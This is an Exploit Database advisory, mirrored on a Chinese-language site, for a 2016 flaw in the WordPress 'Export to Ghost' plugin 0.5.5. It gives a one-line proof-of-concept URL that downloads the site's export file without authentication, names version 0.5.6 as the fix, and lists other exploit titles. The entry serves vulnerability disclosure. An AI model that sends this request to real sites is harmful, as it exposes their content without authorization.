WordPress Plugin Ghost 0.5.5 – Unrestricted Export Download

Exploit Database
15 阅读

作者： Josh Brody

日期： 2016-05-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39752/

# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps
 
1. Description
 
Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
 
2. Proof of Concept

http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file

File will be downloaded.
 
3. Solution:

Update to version 0.5.6

https://downloads.wordpress.org/plugin/ghost.0.5.6.zip

last Exploits
WordPress Plugin Ghost 0.5.5 – Unrestricted Export Download的更多信息

Joomla! Component iNetLanka Multiple root 1.0 – Local File Inclusion：
My Link Trader 1.1 – ‘id’ SQL Injection：
Movable Type Pro 5.13en – Persistent Cross-Site Scripting：
Nitro Web Gallery – SQL Injection：
inoERP 4.15 – ‘download’ SQL Injection：
Joomla! Component com_sectionex 2.5.96 – SQL Injection：
Joomla! Component Abstract 2.1 – SQL Injection：
ECommerce-Multi-Vendor Software – Arbitrary File Upload：